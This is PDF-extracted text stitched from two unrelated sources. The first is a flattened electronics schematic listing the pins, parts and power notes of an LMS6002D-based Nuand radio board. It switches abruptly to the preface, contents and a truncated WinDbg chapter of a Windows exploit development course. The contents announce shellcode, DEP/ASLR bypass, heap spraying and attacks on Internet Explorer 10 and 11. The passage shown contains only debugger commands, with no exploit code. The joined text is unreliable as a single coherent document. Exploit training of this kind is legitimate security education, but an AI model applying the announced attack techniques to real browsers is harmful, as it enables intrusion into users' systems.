100nF C190 
100nF L9 
MMZ0603S601C L9 
MMZ0603S601C 
L25 
MMZ0603S601C L25 
MMZ0603S601C C194 
100nF C194 
100nF R290 
DNP R290 
DNP 
C204 
1uF C204 
1uF 
C188 
100nF C188 
100nF L16 
MMZ0603S601C L16 
MMZ0603S601C 
R257 
10 R257 
10 TP13 TP13 
L26 
MMZ0603S601C L26 
MMZ0603S601C C195 
100nF C195 
100nF C199 
1uF C199 
1uF 
R261 
22 R261 
22 
C208 
1uF C208 
1uF R289 
DNP R289 
DNP 
C201 
100nF C201 
100nF 
C192 
100nF C192 
100nF L8 
MMZ0603S601C L8 
MMZ0603S601C L23 
MMZ0603S601C L23 
MMZ0603S601C 
C191 
100nF C191 
100nF C198 
100nF C198 
100nF 
LMS6002D U1B 
LMS6002D U1B 
PLLCLK 71 
TXEN 66 
TX_CLK 19 
TX_IQ_SEL 20 
TXD0 21 
TXD1 22 
TXD2 23 
TXD3 24 
TXD4 25 
TXD5 26 
TXD6 27 
TXD7 28 
TXD8 29 
TXD9 30 
TXD10 31 
TXD11 32 RXEN 76 
RX_CLK 17 
RX_IQ_SEL 16 
RXD0 15 
RXD1 14 
RXD2 13 
RXD3 10 
RXD4 11 
RXD5 8
RXD6 9
RXD7 6
RXD8 5
RXD9 4
RXD10 3
RXD11 2
RESET 75 
SEN 67 
SCLK 70 
SDIO 69 
SDO 68 RX_CLK_OUT 40 
TSTD_OUT1 65 TSTD_OUT2 77 
5
54
43
32
21
1D D
C C
B B
A ALMS ANALOG + RF 
300MHz - 2.8GHz 
1.5GHz - 3.8GHz 
1.5GHz - 3.8GHz 300MHz - 2.8GHz V3P3_TX_LMS V3P3_TX_LMS 
LMS_RX_V1
LMS_RX_V2LMS_TX_V2 LMS_TX_V1 
LMS_PLLOUT 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
11 14 Thursday, November 08, 2012 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
11 14 Thursday, November 08, 2012 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
11 14 Thursday, November 08, 2012 C313 
3.6pF C313 
3.6pF 
C213 
150pF C213 
150pF 
C243 
8.2nF C243 
8.2nF C245 
8.2nF C245 
8.2nF 
ESD0P8RFL U46 
ESD0P8RFL U46 3
D2N 4
D1P 1
D1N 
2
D2P R269 
51 R269 
51 R267 
51 R267 
51 C320 
20pF C320 
20pF 
R264 
820 R264 
820 
L31 TC1-1-13M 
L31 TC1-1-13M 
1
SD 2 NC 3 S4 P
6
PD 
L33 2.7nH L33 2.7nH C223 
DNP C223 
DNP 
C211 
150pF C211 
150pF C321 
20pF C321 
20pF 
L34 36nH 
L34 36nH 
C209 
470pF C209 
470pF C226 
100nF C226 
100nF L39 
36nH L39 
36nH 
C215 
100nF C215 
100nF 
R282 
51 R282 
51 C237 
1uF C237 
1uF 
C225 
DNP C225 
DNP J54 
SMA J54 
SMA 
GND 1 3
GND 2
IN 
L44 2.7nH L44 2.7nH 
LMS6002D U1C 
LMS6002D U1C 
TXINIP 52 
TXININ 51 
TXINQP 54 
TXINQN 56 
TXCPOUT 64 
TXVTUNE 57 
RXOUTIP 116 
RXOUTIN 115 
RXOUTQP 113 
RXOUTQN 114 
RXCPOUT 80 
RXVTUNE 87 
XRES12K 89 
XRESAD 39 
VREFAD 38 
ATP 42 
PLLCLKOUT 41 
UNUSED 53 
UNUSED 55 
UNUSED 88 
UNUSED 93 C310 20pF 
C310 20pF 
C331 
6.8pF C331 
6.8pF 
LMS6002D U1D 
LMS6002D U1D 
TXOUT1P 48 
TXOUT1N 50 
TXOUT2N 44 
TXOUT2P 46 
OEXLNA1P 91 
IEXMIX1P 92 
IEXMIX1N 94 
OEXLNA1N 95 
RXIN1EP 97 
RXIN1EN 99 
RXIN1P 96 
RXIN1N 98 
RXIN2P 100 
RXIN2N 102 
OEXLNA2P 103 
IEXMIX2P 104 
IEXMIX2N 106 
OEXLNA2N 105 
RXIN3P 108 
RXIN3N 110 C325 
3.6pF C325 
3.6pF C316 
3.6pF C316 
3.6pF 
L36 TC1-1-43+ 
L36 TC1-1-43+ 
1
SD 2 NC 3 S4 P
6
PD 
TP17 TP17 AS211-334 U63 
AS211-334 U63 
J3 1
GND 2
J2 3V1 4
J1 5
V2 6
L32 2.7nH L32 2.7nH C214 
8.2nF C214 
8.2nF 
J61 
PWR_HDR6 J61 
PWR_HDR6 1
2
3 46
5C319 
20pF C319 
20pF 
R272 
390 R272 
390 C246 
8.2nF C246 
8.2nF 
R265 
1.2K R265 
1.2K 
R263 
1.2K R263 
1.2K C240 
1uF C240 
1uF C315 
3.6pF C315 
3.6pF C312 
3.6pF C312 
3.6pF C212 
470pF C212 
470pF 
C324 
3.6pF C324 
3.6pF L40 TC1-1-13M 
L40 TC1-1-13M 
1
SD 2 NC 3 S4 P
6
PD 
L37 
DNP L37 
DNP 
R279 
51 R279 
51 R268 
51 R268 
51 
R262 
820 R262 
820 R266 
51 R266 
51 
L42 TC1-1-43+ 
L42 TC1-1-43+ 
1
SD 2 NC 3 S4 P
6
PD C322 
6.8pF C322 
6.8pF 
L35 36nH 
L35 36nH 
C210 
8.2nF C210 
8.2nF C318 
20pF C318 
20pF 
L43 2.7nH L43 2.7nH C224 
100nF C224 
100nF C317 
20pF C317 
20pF L38 
36nH L38 
36nH 
R271 
12K R271 
12K 
C328 
100pF C328 
100pF L41 
DNP L41 
DNP 
C323 
20pF C323 
20pF 
J53 
SMA J53 
SMA 
GND1 3
GND2
IN J60 
PWR_HDR6 J60 
PWR_HDR6 1
2
3 46
5
C326 3.6pF 
C326 3.6pF C314 
3.6pF C314 
3.6pF 
C309 
20pF C309 
20pF AS211-334 
U62 AS211-334 
U62 J3 1GND 2J2 3
V1 4J1 5V2 6ESD0P8RFL U41 
ESD0P8RFL U41 3
D2N 4
D1P 1
D1N 
2
D2P 
R270 
6800 R270 
6800 C244 
8.2nF C244 
8.2nF 
5
54
43
32
21
1D D
C C
B B
A AThese caps have to be close 
to their respective Vref pins.CLOCKS 
Digital 10mA 
Digital 1mA 
1.32KHz RC filter Cap goes between 2 and 4 Analog 2mA VCCIO_L_C4 V3P58 
VCCIO_L_C4 VCCIO_R_C4_CLK 
CVDDQ 
VA2P5 V3P3_RX_LMS LMS_CLK 
DAC_SDO 
DAC_SDI 
DAC_SCLK 
DAC_CSB EXP_CLK 
FX3_CLK C4_CLK 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
12 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
12 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
12 14 Friday, January 04, 2013 TP40 TP40 L28 
MMZ1005S601C L28 
MMZ1005S601C 
C248 
0.01uF C248 
0.01uF L55 
MMZ1005S601C L55 
MMZ1005S601C 
ASVTX-12-A-38.400MHZ-H10-T U42 
ASVTX-12-A-38.400MHZ-H10-T U42 
CLK 3VCC 1
VDD 4
GND 2
L50 
MMZ1005S601C L50 
MMZ1005S601C L47 
MMZ1005S601C L47 
MMZ1005S601C 
L53 
MMZ1005S601C L53 
MMZ1005S601C C362 
470pF C362 
470pF 
TP31 TP31 TP34 TP34 C221 
0.1uF C221 
0.1uF 
TP30 TP30 C218 
0.1uF C218 
0.1uF 
R284 
51 R284 
51 
C230 
100nF C230 
100nF TC1014-3.0VCT713 U55 
TC1014-3.0VCT713 U55 
VIN 1
GND 2SHDN 3
BYPASS 4OUT 5
C216 
0.1uF C216 
0.1uF 
DAC161S055 U56 
DAC161S055 U56 
VA 1
VOUT 2
NC1 3
NC2 4
NC3 5VREF 6GND 7NC4 8SDO 9
SCLK 10 SDI 11 
CSB 12 
LDACB 13 CLRB 14 
MZB 15 
VDDIO 16 
GND_PAD 17 TP32 TP32 J65 
HEADER_1x3_100mil J65 
HEADER_1x3_100mil 
1
2
3
C250 
DNP C250 
DNP 
J66 
HEADER_1x3_100mil J66 
HEADER_1x3_100mil 
123C365 
1uF C365 
1uF 
L48 
MMZ1005S601C L48 
MMZ1005S601C C227 
0.01uF C227 
0.01uF L54 
MMZ1005S601C L54 
MMZ1005S601C 
Si5330 U39 
Si5330 U39 
IN1 1
IN2 2
IN3 3
GND 4
GND 5
GND 6CLK2B 13 CLK2A 14 VDDO2 15 VDDO1 16 
CLK1B 17 CLK1A 18 
OEB 19 VDDO0 20 
CLK0B 21 CLK0A 22 GND 23 VDD 24 VDD 7
LOS 8
CLK3B 9CLK3A 10 VDDO3 11 GND 12 
PAD_GND 25 
R275 
1.2K R275 
1.2K L46 
MMZ1005S601C L46 
MMZ1005S601C 
TP29 TP29 C348 
0.022uF C348 
0.022uF C249 
0.01uF C249 
0.01uF 
J62 
SMB J62 
SMB 
3
GND 1
IN 
2
GND 5
GND 4
GND C222 
0.1uF C222 
0.1uF 
C229 
0.01uF C229 
0.01uF 
TP33 TP33 C219 
0.1uF C219 
0.1uF 
C217 
0.1uF C217 
0.1uF D1 
LTST-C190KGKT D1 
LTST-C190KGKT 
C345 
0.022uF C345 
0.022uF 
5
54
43
32
21
1D D
C C
B B
A A19.5mOhm 
2mOhm 
2mOhm Ceramic caps will suffice 
Ceramic caps will suffice Analog 3.3V   280mA / 500mA 
Analog 3.3V    220mA / 500mA
Digital 3.3V    106mA / 200mA
Digital 1.8V    140mA / 200mAAnalog 1.8V    ~100mA / 200mA 1.2V    (min:200mA, typ:800mA) / 3100mA / 90% eff 
3.58V    ~800mA / 1300mA / 95% eff POWER DISTRIBUTION The plan is to drop to 1.2V and 3.58V with SMPS. 
Then drop to 3.3, 2.5, 1.8 from the 3.58V SMPS. 
LMS - 67.1mA 
FPGA - 25mA 
FX3 - 25 mA 
Clocks - XOs - 12mA 
SPI flash - 20mA max (please verify this) 10mOhm 
2mOhm 
2mOhm 
VDO @ 200mA typ:90mV max:160mV VDO @ 500mA 100mV VDO @ 500mA 100mV 
2mOhm 
Analog 2.5V    30mA / 100mA V3P58 V1P2 
V3P58 
V3P58 V3P58 V3P58 
V3P58 
V3P58 V3P58 
VA1P8 
VD1P8 V3P3_RX_LMS V3P3_TX_LMS 
V1P2 
VD3P3 
VA2P5 V5P0 
V5P0 
Title 
Size Document Number Rev
Date: Sheet of Power ANuand 
B
13 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of Power ANuand 
B
13 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of Power ANuand 
B
13 14 Friday, January 04, 2013 C352 
10nF C352 
10nF 
R285 
100K R285 
100K C344 
0.01uF C344 
0.01uF 
C329 
22uF C329 
22uF 
TPS79318DBVR U50 
TPS79318DBVR U50 
IN 1
GND 2EN 3OUT 5
NR 4
C358 
1uF C358 
1uF FB13 
MPZ2012S601A FB13 
MPZ2012S601A 
C327 
6.8nF C327 
6.8nF TPS79533DCQR U54 
TPS79533DCQR U54 
EN 1
IN 2
GND 3OUT 4
NR/FB 5GND 6
C335 
2.2uF C335 
2.2uF R303 
1.87K R303 
1.87K 
C332 
22uF C332 
22uF 
C336 
0.01uF C336 
0.01uF C347 
0.01uF C347 
0.01uF R300 
11.8K R300 
11.8K 
R281 
10.5K R281 
10.5K L45 
3.3uH L45 
3.3uH R302 
49.9K R302 
49.9K 
R306 
49.9K R306 
49.9K C356 
2.2uF C356 
2.2uF FB12 
MPZ2012S601A FB12 
MPZ2012S601A 
C351 
1uF C351 
1uF 
C337 
2.2uF C337 
2.2uF FB16 
MPZ2012S601A FB16 
MPZ2012S601A 
TPS79318DBVR U49 
TPS79318DBVR U49 
IN 1
GND 2EN 3OUT 5
NR 4C340 
2.2uF C340 
2.2uF C355 
2.2uF C355 
2.2uF 
C349 
6.8nF C349 
6.8nF 
C360 
0.1uF C360 
0.1uF TPS79933DDCT U65 
TPS79933DDCT U65 
EN 3IN 1
GND 2OUT 5
NR/FB 4
C366 
470pF C366 
470pF R283 
2.32K R283 
2.32K C354 
22uF C354 
22uF 
C361 
1uF C361 
1uF LM20143 U48 
LM20143 U48 
SS/TRK 1FB 2
PGOOD 3
COMP 4
NC 5PVIN 6PVIN 7
SW 8SW 9PGND 10 PGND 11 EN 12 
VCC 13 AVIN 14 
AGND 15 RT 16 
GNDPAD 17 R305 
1R305 
1FB11 
MPZ2012S601A FB11 
MPZ2012S601A 
R299 
154K R299 
154K 
TC1185-2.5VCT713 U66 
TC1185-2.5VCT713 U66 
VIN 1
GND 2SHDN 3
BYPASS 4OUT 5C357 
2.2uF C357 
2.2uF 
C334 
2.2uF C334 
2.2uF C343 
2.2uF C343 
2.2uF 
FB15 
MPZ2012S601A FB15 
MPZ2012S601A C359 
22uF C359 
22uF 
C333 
0.01uF C333 
0.01uF R301 
5.9K R301 
5.9K 
C330 
5.6nF C330 
5.6nF L49 
4uH L49 
4uH 
FB14 
MPZ2012S601A FB14 
MPZ2012S601A R304 
1R304 
1
C342 
0.01uF C342 
0.01uF 
C339 
1uF C339 
1uF R280 
36.5K R280 
36.5K LM20146 U58 
LM20146 U58 
SS/TRK 1FB 2
PGOOD 3
COMP 4
NC 5PVIN 6PVIN 7
SW 8SW 9PGND 10 PGND 11 EN 12 
VCC 13 AVIN 14 
AGND 15 RT 16 
GNDPAD 17 TPS79533DCQR U53 
TPS79533DCQR U53 
EN 1
IN 2
GND 3OUT 4
NR/FB 5GND 6 C350 
22uF C350 
22uF 
C338 
2.2uF C338 
2.2uF C353 
0.1uF C353 
0.1uF 
C346 
2.2uF C346 
2.2uF 
5
54
43
32
21
1D D
C C
B B
A AScatter these testpoints throughout the design. 
Testpoints will be PTH POWER SELECTION + DEBUG 
VD3P3 V3P3_RX_LMS V1P2 V3P3_TX_LMS V3P58 
VA1P8 VD1P8 VA2P5 VDC 
VBUS_IN V5P0 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
14 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
14 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
14 14 Friday, January 04, 2013 D4 
LTST-C190KGKT D4 
LTST-C190KGKT 
TP39 TP39 +C123 
330uF_10V +C123 
330uF_10V 
D9 
LTST-C190KGKT D9 
LTST-C190KGKT D8 
LTST-C190KGKTD8 
LTST-C190KGKTR294 
DNP R294 
DNP D3 
LTST-C190KGKT D3 
LTST-C190KGKT 
R291 
DNP R291 
DNP +C121 
100uF_10V +C121 
100uF_10V 
D7 
LTST-C190KGKTD7 
LTST-C190KGKT+C122 
100uF_10V +C122 
100uF_10V 
TP26 TP26 R293 
DNP R293 
DNP 
D6 
LTST-C190KGKT D6 
LTST-C190KGKT 
TP25 TP25 J49 
RAPC712X 
PART_NUMBER = RAPC712X Manufacturer = Switchcraft Inc. J49 
RAPC712X 
PART_NUMBER = RAPC712X Manufacturer = Switchcraft Inc. 32
1
R298 
DNP R298 
DNP R297 
DNP R297 
DNP R292 
DNP R292 
DNP D2 
LTST-C190KGKT D2 
LTST-C190KGKT D5 
LTST-C190KGKTD5 
LTST-C190KGKT
TP23 TP23 R296 
DNP R296 
DNP +C124 
330uF_10V +C124 
330uF_10V J70 
PWR_HDR6 J70 
PWR_HDR6 1
2
3 46
5
R295 
DNP R295 
DNP exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 1 
-
 
 
Modern Windows Exploit
 
Development
 
 
By :
 
massimi
l
iano To
massoli
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
Pdf By : 
NO
-
MERCY
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 2 
-
 
 
Preface
 
Hi and welcome 
to this website! I know people don’t like to read prefaces, so I’ll make it short and right to the 
point.
 
This is the preface to a course about 
Modern Windows Exploit Development
. I chose Windows because I’m 
very familiar with it and also because it’s very
 popular. In particular, I chose Windows 7 SP1 64
-
bit. Enough 
with Windows XP: it’s time to move on!
 
There are a few full
-
fledged courses about Exploit Development but they’re all very expensive. If you can’t 
afford such courses, you can scour the Internet
 for papers, articles and some videos. Unfortunately, the 
information is scattered all around the web and most resources are definitely not for beginners. If you always 
wanted to learn Exploit Development but either you couldn’t afford it or you had a hard
 time with it, you’ve 
come to the right place!
 
This is an introductory course but please don’t expect it to be child’s play. Exploit Development is hard and 
no one can change this fact, no matter how good he/she is at explaining things. I’ll try very hard 
to be as 
clear as possible. If there’s something you don’t understand or if you think I made a mistake, you can leave 
a brief comment or create a thread in the forum for a longer discussion. I must admit that I’m not an expert. I 
did a lot of research to w
rite this course and I also learned a lot by writing it. The fact that I’m an old
-
time 
reverse engineer helped a lot, though.
 
In this course I won’t just present facts, but I’ll show you how to deduce them by yourself. I’ll try to motivate 
everything we do
. I’ll never tell you to do something without giving you a technical reason for it. In the last 
part of the course we’ll attack Internet Explorer 10 and 11. My main objective is not just to show you how to 
attack Internet Explorer, but to show you how a co
mplex attack is first researched and then carried out. 
Instead of presenting you with facts about Internet Explorer, we’re going to reverse engineer part of Internet 
Explorer and learn by ourselves how objects are laid out in memory and how we can exploit 
what we’ve 
learned. This thoroughness requires that you understand every single step of the process or you’ll get lost in 
the details.
 
As you’ve probably realized by now, English is not my first language (I’m Italian). This means that reading 
this course h
as advantages (learning Exploit Development) and disadvantages (unlearning some of your 
English). Do you still want to read it? Choose wisely 
 
To benefit from this course you need to know and be comfortable with X86 assembly. This is not negotiable! 
I didn
’t even try to include an assembly primer in this course because you can certainly learn it on your own. 
Internet is full of resources for learning assembly. Also, this course is very hands
-
on so you should follow 
along and replicate what I do. I suggest t
hat you create at least two virtual machines with Windows 7 SP1 
64
-
bit: one with Internet Explorer 10 and the other with Internet Explorer 11.
 
I hope you enjoy the ride!
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 3 
-
 
 
Contents
 
 
1
.
 
WinDbg
 
2
.
 
Mona 2
 
3
.
 
Structure Exception Handling (SEH)
 
4
.
 
Heap
 
5
.
 
Windows Basics
 
6
.
 
Shellcode
 
7
.
 
Exploitme1 (ret eip overwrite)
 
8
.
 
Exploitme2 (Stack cookies & SEH)
 
9
.
 
Exploitme3 (DEP)
 
10
.
 
Exploitme4 (ASLR)
 
11
.
 
Exploitme5 (Heap Spraying & UAF)
 
12
.
 
EMET 5.2
 
13
.
 
Internet Explorer 10
 
13
.
1
.
 
Reverse Engineering IE
 
13
.
2
.
 
From one
-
byte
-
write to full process space read/write
 
13
.
3
.
 
God Mode (1)
 
13
.
4
.
 
God Mode (2)
 
13
.
5
.
 
U
se
-
After
-
Free bug
 
14
.
 
Internet Explorer 11
 
14
.
1
.
 
Part 1
 
14
.
2
.
 
Part 2
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 4 
-
 
WinDbg
 
 
WinDbg 
is a great debugger, but it has lots of commands, so it takes time to get comfortable with it. I’ll be 
very brief and concise so that I don’t bore you to death! To do this, I’ll only show you the essential 
commands and t
he most important options. We’ll see additional commands and options when we need them 
in the next chapters.
 
Version
 
To avoid problems, use the 
32
-
bit
 version of WinDbg to debug 32
-
bit executables and the 
64
-
bit
 version to 
debug 64
-
bit executables.
 
Alterna
tively, you can switch WinDbg between the 32
-
bit and 64
-
bit modes with the following command:
 
!wow64exts.sw
 
Symbols
 
Open a new instance of WinDbg (if you’re debugging a process with WinDbg, close WinDbg and reopen it).
 
Under 
File
→
Symbol File Path
 enter
 
SRV*
C:
\
windbgsymbols
*
http://msdl.microsoft.com/download/symbols
 
Save the workspace (
File
→
Save Workspace
).
 
The asterisks are delimiters. WinDbg will use the first directory we specified above as a local cache for 
symbols. The paths/u
rls after the second asterisk (separated by ‘
;
‘, if more than one) specify the locations 
where the symbols can be found.
 
Adding Symbols during Debugging
 
To append a symbol search path to the default one during debugging, use
 
.sympath+ 
c:
\
symbolpath
 
(The co
mmand without the ‘
+
‘ would replace the default search path rather than append to it.)
 
Now reload the symbols:
 
.reload
 
Checking Symbols
 
Symbols
, if available, are loaded when needed. To see what modules have symbols loaded, use
 
x *!
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 5 
-
 
The 
x
 command supports 
wildcards and can be used to search for symbols in one or more modules. For 
instance, we can search for all the symbols in 
kernel32
 whose name starts with 
virtual
 this way:
 
0:000> x kernel32!virtual*
 
757d4b5f          kernel32!VirtualQueryExStub (<no param
eter info>)
 
7576d950          kernel32!VirtualAllocExStub (<no parameter info>)
 
757f66f1          kernel32!VirtualAllocExNuma (<no parameter info>)
 
757d4b4f          kernel32!VirtualProtectExStub (<no parameter info>)
 
757542ff          kernel32!VirtualProt
ectStub (<no parameter info>)
 
7576d975          kernel32!VirtualFreeEx (<no parameter info>)
 
7575184b          kernel32!VirtualFree (<no parameter info>)
 
75751833          kernel32!VirtualAlloc (<no parameter info>)
 
757543ef          kernel32!VirtualQuery 
(<no parameter info>)
 
757510c8          kernel32!VirtualProtect (<no parameter info>)
 
757ff14d          kernel32!VirtualProtectEx (<no parameter info>)
 
7575183e          kernel32!VirtualFreeStub (<no parameter info>)
 
75751826          kernel32!VirtualAlloc
Stub (<no parameter info>)
 
7576d968          kernel32!VirtualFreeExStub (<no parameter info>)
 
757543fa          kernel32!VirtualQueryStub (<no parameter info>)
 
7576eee1          kernel32!VirtualUnlock (<no parameter info>)
 
7576ebdb          kernel32!Virtua
lLock (<no parameter info>)
 
7576d95d          kernel32!VirtualAllocEx (<no parameter info>)
 
757d4b3f          kernel32!VirtualAllocExNumaStub (<no parameter info>)
 
757ff158          kernel32!VirtualQueryEx (<no parameter info>)
 
The wildcards can also be us
ed in the module part:
 
0:000> x *!messagebox*
 
7539fbd1          USER32!MessageBoxIndirectA (<no parameter info>)
 
7539fcfa          USER32!MessageBoxExW (<no parameter info>)
 
7539f7af          USER32!MessageBoxWorker (<no parameter info>)
 
7539fcd6          
USER32!MessageBoxExA (<no parameter info>)
 
7539fc9d          USER32!MessageBoxIndirectW (<no parameter info>)
 
7539fd1e          USER32!MessageBoxA (<no parameter info>)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 6 
-
 
7539fd3f          USER32!MessageBoxW (<no parameter info>)
 
7539fb28          USER32!Mes
sageBoxTimeoutA (<no parameter info>)
 
7539facd          USER32!MessageBoxTimeoutW (<no parameter info>)
 
You can force WinDbg to load symbols for all modules with
 
ld*
 
This takes a while. Go to 
Debug
→
Break
 to stop the operation.
 
Help
 
 
Just type
 
.hh
 
or press 
F1
 to open help window.
 
To get help for a specific command type
 
.hh <command>
 
where 
<command>
 is the command you’re interested in, or press 
F1
 and select the tab 
Index
 where you can 
search for the topic/command you want.
 
Debugging Modes
 
Locally
 
You can eit
her debug a new process or a process already running:
 
1
.
 
Run a new process to debug with 
File
→
Open Executable
.
 
2
.
 
Attach to a process already running with 
File
→
Attach to a Process
.
 
Remotely
 
To debug a program remotely there are at least two options:
 
1
.
 
If you’re already debugging a program locally on machine 
A
, you can enter the following command 
(choos
e the 
port
 you want):
 
.server tcp:port=1234
 
This will start a server within WinDbg.
 
On machine 
B
, run WinDbg and go to 
File
→
Connect to Remote Session
 and enter
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 7 
-
 
tcp:Port=1234,Server=<IP of Machine A>
 
specifying the right 
port
 and 
IP
.
 
2
.
 
On machine 
A
, run 
dbgsr
v
 with the following command:
 
dbgsrv.exe 
-
t tcp:port=1234
 
This will start a server on machine 
A
.
 
On machine 
B
, run WinDbg, go to 
File
→
Connect to Remote Stub
 and enter
 
tcp:Port=1234,Server=<IP of Machine A>
 
with the appropriate parameters.
 
You’ll see that 
F
ile
→
Open Executable
 is disabled, but you can choose 
File
→
Attach to a Process
. In that 
case, you’ll see the list of processes on machine 
A
.
 
To stop the server on machine A you can use Task Manager and kill 
dbgsrv.exe
.
 
Modules
 
When you 
load an executable
 or 
attach to a process
, WinDbg will list the loaded modules. If you want to list 
the modules again, enter
 
lmf
 
To list a specific module, say 
ntdll.dll
, use
 
lmf m ntdll
 
To get the 
image header
 information of a module, say 
ntdll.dll
, type
 
!dh ntdll
 
The ‘
!
‘ mean
s that the command is an 
extension
, i.e. an external command which is exported from an 
external 
DLL
 and called inside WinDbg. Users can create their own extensions to extend WinDbg’s 
functionality.
 
You can also use the start address of the module:
 
0:000> l
mf m ntdll
 
start    end        module name
 
77790000 77910000   ntdll    ntdll.dll   
 
0:000> !dh 77790000
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 8 
-
 
Expressions
 
WinDbg supports 
expressions,
 meaning that when a value is required, you can type the value directly or you 
can type an expression that eval
uates to a value.
 
For instance, if 
EIP
 is 
77c6cb70
, then
 
bp 77c6cb71
 
and
 
bp EIP+1
 
are equivalent.
 
You can also use symbols:
 
u ntdll!CsrSetPriorityClass+0x41
 
and registers:
 
dd ebp+4
 
Numbers are by default in base 
16
. To be explicit about the base used, add 
a prefix:
 
0x123: base 16 (hexadecimal)
 
0n123: base 10 (decimal)
 
0t123: base 8 (octal)
 
0y111: base 2 (binary)
 
Use the command 
.format
 to display a value in many formats:
 
0:000> .formats 123
 
 Evaluate expression:
 
 Hex:     00000000`00000123
 
 Decimal: 291
 
 Oc
tal:   0000000000000000000443
 
 Binary:  00000000 00000000 00000000 00000000 00000000 00000000 00000001 00100011
 
 Chars:   .......#
 
 Time:    Thu Jan 01 01:04:51 1970
 
 Float:   low 4.07778e
-
043 high 0
 
 Double:  1.43773e
-
321
 
To evaluate an expression use ‘
?
‘
:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 9 
-
 
? eax+4
 
Registers and Pseudo
-
registers
 
WinDbg supports several 
pseudo
-
registers
 that hold certain values. Pseudo
-
registers are indicated by the 
prefix ‘
$
‘.
 
When using registers or pseudo
-
registers, one can add the prefix ‘
@
‘ which tells WinDbg that what 
follows is 
a register and not a symbol. If ‘
@
‘ is not used, WinDbg will first try to interpret the name as a symbol.
 
Here are a few examples of pseudo
-
registers:
 

 
$teb
 or 
@$teb
 (address of the 
TEB
)
 

 
$peb
 or 
@$peb
 (address of the 
PEB
)
 

 
$thread
 or 
@$thread
 (cur
rent thread)
 
Exceptions
 
To break on a specific exception, use the command 
sxe
. For instance, to break when a module is loaded, 
type
 
sxe ld <module name 1>,...,<module name N>
 
For instance,
 
sxe ld user32
 
To see the list of exceptions type
 
sx
 
To ignore an ex
ception, use 
sxi
:
 
sxi ld
 
This cancels out the effect of our first command.
 
WinDbg breaks on 
single
-
chance
 exceptions and 
second
-
chance
 exceptions. They’re not different kinds of 
exceptions. As soon as there’s an exception, WinDbg stops the execution and sa
ys that there’s been a 
single
-
chance exception. Single
-
chance means that the exception hasn’t been sent to the debuggee yet. 
When we resume the execution, WinDbg sends the exception to the debuggee. If the debuggee doesn’t 
handle the exception, WinDbg stop
s again and says that there’s been a second
-
chance exception.
 
When we examine EMET 5.2, we’ll need to ignore single
-
chance 
single step exceptions
. To do that, we can 
use the following command:
 
sxd sse
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 10 
-
 
Breakpoints
 
Software Breakpoints
 
When you put a 
softwar
e breakpoint
 on one instruction, WinDbg saves to memory the first byte of the 
instruction and overwrites it with 
0xCC
 which is the opcode for “
int 3
“.
 
When the “
int 3
” is executed, the breakpoint is triggered, the execution stops and WinDbg restores the 
in
struction by restoring its first byte.
 
To put a software breakpoint on the instruction at the address 
0x4110a0
 type
 
bp 4110a0
 
You can also specify the number of 
passes
 required to activate the breakpoint:
 
bp 4110a0 3
 
This means that the breakpoint will be 
ignored the first 
2
 times it’s encountered.
 
To resume the execution (and stop at the first breakpoint encountered) type
 
g
 
which is short for “
go
“.
 
To run until a certain address is reached (containing code), type
 
g <code location>
 
Internally, WinDbg will p
ut a software breakpoint on the specified location (like ‘
bp
‘), but will remove the 
breakpoint after it has been triggered. Basically, ‘
g
‘ puts a 
one
-
time
 software breakpoint.
 
Hardware Breakpoints
 
Hardware breakpoints
 use specific registers of the 
CPU
 and 
are more versatile than software breakpoints. In 
fact, one can break 
on execution
 or 
on memory access
.
 
Hardware breakpoints don’t modify any code so they can be used even with 
self modifying code
. 
Unfortunately, you can’t set more than 4 breakpoints.
 
In it
s simplest form, the format of the command is
 
ba <mode> <size> <address> <passes (default=1)>
 
where 
<mode>
 can be
 
1
.
 
‘
e
‘ for 
execute
 
2
.
 
‘
r
‘ for 
read
/
write memory access
 
3
.
 
‘
w
‘ for 
write memory access
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 11 
-
 
<size>
 specifies the size of the location, in bytes, to monitor f
or access (it’s always 1 when 
<mode>
 is ‘
e
‘).
 
<address>
 is the location where to put the breakpoint and 
<passes>
 is the number of passes needed to 
activate the breakpoint (see ‘
bp
‘ for an example of its usage).
 
Note:
 It’s not possible to use hardware break
points for a process before it has started because hardware 
breakpoints are set by modifying CPU registers (
dr0
, 
dr1
, etc...) and when a process starts and its threads 
are created the registers are reset.
 
Handling Breakpoints
 
To list the breakpoints type
 
bl
 
where ‘
bl
‘ stands for 
breakpoint list
.
 
Example:
 
0:000> bl
 
0 e 77c6cb70     0002 (0002)  0:**** ntdll!CsrSetPriorityClass+0x40
 
where the fields, from left to right, are as follows:
 

 
0
: breakpoint ID
 

 
e
: breakpoint status; can be (
e
)nabled or (
d
)isabled
 

 
